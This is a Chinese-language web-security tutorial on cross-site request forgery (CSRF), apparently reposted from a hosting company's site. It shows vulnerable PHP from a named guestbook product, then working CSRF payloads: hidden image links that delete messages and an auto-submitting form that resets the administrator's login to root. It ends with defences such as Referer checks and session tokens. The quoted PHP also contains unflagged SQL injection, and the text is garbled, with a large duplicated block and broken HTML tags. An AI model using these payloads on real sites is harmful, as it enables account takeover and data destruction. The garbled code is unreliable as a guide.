CSRF(Cross Site Request Forgeries),意為跨網(wǎng)站請求偽造,也有寫為XSRF。攻擊者偽造目標用戶的HTTP請求,然后此請求發(fā)送到有CSRF漏洞的網(wǎng)站,網(wǎng)站執(zhí)行此請求后,引發(fā)跨站請求偽造攻擊。攻擊者利用隱蔽的HTTP連接,讓目標用戶在不注意的情況下單擊這個鏈接,由于是用戶自己點擊的,而他又是合法用戶擁有合法權限,所以目標用戶能夠在網(wǎng)站內執(zhí)行特定的HTTP鏈接,從而達到攻擊者的目的。
例如:某個購物網(wǎng)站購買商品時,采用http://www.shop.com/buy.php?item=watch&num=1,item參數(shù)確定要購買什么物品,num參數(shù)確定要購買數(shù)量,如果攻擊者以隱藏的方式發(fā)送給目標用戶鏈接
,那么如果目標用戶不小心訪問以后,購買的數(shù)量就成了1000個
實例
隨緣網(wǎng)絡PHP留言板V1.0
任意刪除留言
//delbook.php 此頁面用于刪除留言
- include_once("dlyz.php");
- include_once("../conn.php");
- $del=$_GET["del"];
- $id=$_GET["id"];
- if ($del=="data")
- {
- $ID_Dele= implode(",",$_POST['adid']);
- $sql="delete from book where id in (".$ID_Dele.")";
- mysql_query($sql);
- }
- else
- {
- $sql="delete from book where id=".$id;
- mysql_query($sql);
- }
- mysql_close($conn);
- echo "";
- echo "alert(‘刪除成功!’);";
- echo " location=’book.php’;";
- echo "";
- ?>
當我們具有admin權限,提交http://localhost/manage/delbook.php?id=2 時,就會刪除id為2的留言
利用方法:
我們使用普通用戶留言(源代碼方式),內容為
- "delbook.php?id=2" />
- "delbook.php?id=3" />
- "delbook.php?id=4" />
- "delbook.php?id=5" />
插入4張圖片鏈接分別刪除4個id留言,然后我們返回首頁瀏覽看,沒有什么變化。。圖片顯示不了
現(xiàn)在我們再用管理員賬號登陸后,來刷新首頁,會發(fā)現(xiàn)留言就剩一條,其他在圖片鏈接中指定的ID號的留言,全部都被刪除。
攻擊者在留言中插入隱藏的圖片鏈接,此鏈接具有刪除留言的作用,而攻擊者自己訪問這些圖片鏈接的時候,是不具有權限的,所以看不到任何效果,但是當管理員登陸后,查看此留言,就會執(zhí)行隱藏的鏈接,而他的權限又是足夠大的,從而這些留言就被刪除了
修改管理員密碼
-
- if($_GET["act"])
- {
- $username=$_POST["username"];
- $sh=$_POST["sh"];
- $gg=$_POST["gg"];
- $title=$_POST["title"];
- $copyright=$_POST["copyright"]."
設計制作:廈門隨緣網(wǎng)絡科技"; - $password=md5($_POST["password"]);
- if(emptyempty($_POST["password"]))
- {
- $sql="update gly set username=’".$username."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1";
- }
- else
- {
- $sql="update gly set username=’".$username."’,password=’".$password."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1";
- }
- mysql_query($sql);
- mysql_close($conn);
- echo "";
- echo "alert(‘修改成功!’);";
- echo " location=’pass.php’;";
- echo "";
- }
這個文件用于修改管理密碼和網(wǎng)站設置的一些信息,我們可以直接構造如下表單:
- <body>
- <form action="http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1">
- <input type="radio" value="1" name="sh">
- <input type="radio" name="sh" checked value="0">
- <input type="text" name="username" value="root">
- <input type="password" name="password" value="root">
- <input type="text" name="title" value="隨緣網(wǎng)絡PHP留言板V1.0(帶審核功能)" >
- <textarea name="gg" rows="6" cols="80" >歡迎您安裝使用隨緣網(wǎng)絡PHP留言板V1.0(帶審核功能)!textarea>
- <textarea name="copyright" rows="6" cols="80" >隨緣網(wǎng)絡PHP留言本V1.0 版權所有:廈門隨緣網(wǎng)絡科技 2005-2009<br/>承接網(wǎng)站建設及系統(tǒng)定制 提供優(yōu)惠主機域名textarea>
- form>
- body>
存為attack.html,放到自己網(wǎng)站上http://www.sectop.com/attack.html,此頁面訪問后會自動向目標程序的pass.php提交參數(shù),用戶名修改為root,密碼修改為root,然后我們去留言板發(fā)一條留言,隱藏這個鏈接,管理訪問以后,他的用戶名和密碼全部修改成了root
防范方法
防范CSRF要比防范其他攻擊更加困難,因為CSRF的HTTP請求雖然是攻擊者偽造的,但是卻是由目標用戶發(fā)出的,一般常見的防范方法有下面幾種:
1、檢查網(wǎng)頁的來源
2、檢查內置的隱藏變量
3、使用POST,不要使用GET
檢查網(wǎng)頁來源
在//pass.php頭部加入以下紅色字體代碼,驗證數(shù)據(jù)提交
- if($_GET["act"])
- {
- if(isset($_SERVER["HTTP_REFERER"]))
- {
- $serverhost = $_SERVER["SERVER_NAME"];
- $strurl = str_replace("http://","",$_SERVER["HTTP_REFERER"]);
- $strdomain = explode("/",$strurl);
- $sourcehost = $strdomain[0];
- if(strncmp($sourcehost, $serverhost, strlen($serverhost)))
- {
- unset($_POST);
- echo "";
- echo "alert(‘數(shù)據(jù)來源異常!’);";
- echo " location=’index.php’;";
- echo "";
- }
- }
- $username=$_POST["username"];
- $sh=$_POST["sh"];
- $gg=$_POST["gg"];
- $title=$_POST["title"];
- $copyright=$_POST["copyright"]."
設計制作:廈門隨緣網(wǎng)絡科技"; - $password=md5($_POST["password"]);
- if(emptyempty($_POST["password"]))
- {
- $sql="update gly set username=’".$username."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1";
- }
- else
- {
- $sql="update gly set username=’".$username."’,password=’".$password."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1";
- }
- mysql_query($sql);
- mysql_close($conn);
- echo "";
- echo "alert(‘修改成功!’);";
- echo " location=’pass.php’;";
- echo "";
- }
檢查內置隱藏變量
我們在表單中內置一個隱藏變量和一個session變量,然后檢查這個隱藏變量和session變量是否相等,以此來判斷是否同一個網(wǎng)頁所調用
- php
- include_once("dlyz.php");
- include_once("../conn.php");
- if($_GET["act"])
- {
- if (!isset($_SESSION["post_id"]))
- {
- // 生成唯一的ID,并使用MD5來加密
- $post_id = md5(uniqid(rand(), true));
- // 創(chuàng)建Session變量
- $_SESSION["post_id"] = $post_id;
- }
- // 檢查是否相等
- if (isset($_SESSION["post_id"]))
- {
- // 不相等
- if ($_SESSION["post_id"] != $_POST["post_id"])
- {
- // 清除POST變量
- unset($_POST);
- echo "<script language=’javascript’>";
- echo "alert(‘數(shù)據(jù)來源異常!’);";
- echo " location=’index.php’;";
- echo "script>";
- }
- }
- ……
- <input type="reset" name="Submit2" value="重 置">
- <input type="hidden" name="post_id" value="php echo $_SESSION["post_id"];?>">
- td>tr>
- table>
- form>
- php
- }
- mysql_close($conn);
- ?>
- body>
- html>
使用POST,不要使用GET
傳遞表單字段時,一定要是用POST,不要使用GET,處理變量也不要直接使用$_REQUEST 本文出自:億恩科技【mszdt.com】
include_once("dlyz.php"); include_once("../conn.php"); $del=$_GET["del"]; $id=$_GET["id"]; if ($del=="data") { $ID_Dele= implode(",",$_POST['adid']); $sql="delete from book where id in (".$ID_Dele.")"; mysql_query($sql); } else { $sql="delete from book where id=".$id; mysql_query($sql); } mysql_close($conn); echo ""; echo "alert(‘刪除成功!’);"; echo " location=’book.php’;"; echo ""; ?>
當我們具有admin權限,提交http://localhost/manage/delbook.php?id=2 時,就會刪除id為2的留言
利用方法:
我們使用普通用戶留言(源代碼方式),內容為
- "delbook.php?id=2" />
- "delbook.php?id=3" />
- "delbook.php?id=4" />
- "delbook.php?id=5" />
插入4張圖片鏈接分別刪除4個id留言,然后我們返回首頁瀏覽看,沒有什么變化。。圖片顯示不了
現(xiàn)在我們再用管理員賬號登陸后,來刷新首頁,會發(fā)現(xiàn)留言就剩一條,其他在圖片鏈接中指定的ID號的留言,全部都被刪除。
攻擊者在留言中插入隱藏的圖片鏈接,此鏈接具有刪除留言的作用,而攻擊者自己訪問這些圖片鏈接的時候,是不具有權限的,所以看不到任何效果,但是當管理員登陸后,查看此留言,就會執(zhí)行隱藏的鏈接,而他的權限又是足夠大的,從而這些留言就被刪除了
修改管理員密碼
-
- if($_GET["act"])
- {
- $username=$_POST["username"];
- $sh=$_POST["sh"];
- $gg=$_POST["gg"];
- $title=$_POST["title"];
- $copyright=$_POST["copyright"]."
設計制作:廈門隨緣網(wǎng)絡科技"; - $password=md5($_POST["password"]);
- if(emptyempty($_POST["password"]))
- {
- $sql="update gly set username=’".$username."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1";
- }
- else
- {
- $sql="update gly set username=’".$username."’,password=’".$password."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1";
- }
- mysql_query($sql);
- mysql_close($conn);
- echo "";
- echo "alert(‘修改成功!’);";
- echo " location=’pass.php’;";
- echo "";
- }
這個文件用于修改管理密碼和網(wǎng)站設置的一些信息,我們可以直接構造如下表單:
- <body>
- <form action="http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1">
- <input type="radio" value="1" name="sh">
- <input type="radio" name="sh" checked value="0">
- <input type="text" name="username" value="root">
- <input type="password" name="password" value="root">
- <input type="text" name="title" value="隨緣網(wǎng)絡PHP留言板V1.0(帶審核功能)" >
- <textarea name="gg" rows="6" cols="80" >歡迎您安裝使用隨緣網(wǎng)絡PHP留言板V1.0(帶審核功能)!textarea>
- <textarea name="copyright" rows="6" cols="80" >隨緣網(wǎng)絡PHP留言本V1.0 版權所有:廈門隨緣網(wǎng)絡科技 2005-2009<br/>承接網(wǎng)站建設及系統(tǒng)定制 提供優(yōu)惠主機域名textarea>
- form>
- body>
存為attack.html,放到自己網(wǎng)站上http://www.sectop.com/attack.html,此頁面訪問后會自動向目標程序的pass.php提交參數(shù),用戶名修改為root,密碼修改為root,然后我們去留言板發(fā)一條留言,隱藏這個鏈接,管理訪問以后,他的用戶名和密碼全部修改成了root
防范方法
防范CSRF要比防范其他攻擊更加困難,因為CSRF的HTTP請求雖然是攻擊者偽造的,但是卻是由目標用戶發(fā)出的,一般常見的防范方法有下面幾種:
1、檢查網(wǎng)頁的來源
2、檢查內置的隱藏變量
3、使用POST,不要使用GET
檢查網(wǎng)頁來源
在//pass.php頭部加入以下紅色字體代碼,驗證數(shù)據(jù)提交
- if($_GET["act"])
- {
- if(isset($_SERVER["HTTP_REFERER"]))
- {
- $serverhost = $_SERVER["SERVER_NAME"];
- $strurl = str_replace("http://","",$_SERVER["HTTP_REFERER"]);
- $strdomain = explode("/",$strurl);
- $sourcehost = $strdomain[0];
- if(strncmp($sourcehost, $serverhost, strlen($serverhost)))
- {
- unset($_POST);
- echo "";
- echo "alert(‘數(shù)據(jù)來源異常!’);";
- echo " location=’index.php’;";
- echo "";
- }
- }
- $username=$_POST["username"];
- $sh=$_POST["sh"];
- $gg=$_POST["gg"];
- $title=$_POST["title"];
- $copyright=$_POST["copyright"]."
設計制作:廈門隨緣網(wǎng)絡科技"; - $password=md5($_POST["password"]);
- if(emptyempty($_POST["password"]))
- {
- $sql="update gly set username=’".$username."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1";
- }
- else
- {
- $sql="update gly set username=’".$username."’,password=’".$password."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1";
- }
- mysql_query($sql);
- mysql_close($conn);
- echo "";
- echo "alert(‘修改成功!’);";
- echo " location=’pass.php’;";
- echo "";
- }
檢查內置隱藏變量
我們在表單中內置一個隱藏變量和一個session變量,然后檢查這個隱藏變量和session變量是否相等,以此來判斷是否同一個網(wǎng)頁所調用
- php
- include_once("dlyz.php");
- include_once("../conn.php");
- if($_GET["act"])
- {
- if (!isset($_SESSION["post_id"]))
- {
- // 生成唯一的ID,并使用MD5來加密
- $post_id = md5(uniqid(rand(), true));
- // 創(chuàng)建Session變量
- $_SESSION["post_id"] = $post_id;
- }
- // 檢查是否相等
- if (isset($_SESSION["post_id"]))
- {
- // 不相等
- if ($_SESSION["post_id"] != $_POST["post_id"])
- {
- // 清除POST變量
- unset($_POST);
- echo "<script language=’javascript’>";
- echo "alert(‘數(shù)據(jù)來源異常!’);";
- echo " location=’index.php’;";
- echo "script>";
- }
- }
- ……
- <input type="reset" name="Submit2" value="重 置">
- <input type="hidden" name="post_id" value="php echo $_SESSION["post_id"];?>">
- td>tr>
- table>
- form>
- php
- }
- mysql_close($conn);
- ?>
- body>
- html>
使用POST,不要使用GET
傳遞表單字段時,一定要是用POST,不要使用GET,處理變量也不要直接使用$_REQUEST 本文出自:億恩科技【mszdt.com】 -->
服務器租用/服務器托管中國五強!虛擬主機域名注冊頂級提供商!15年品質保障!--億恩科技[ENKJ.COM]
|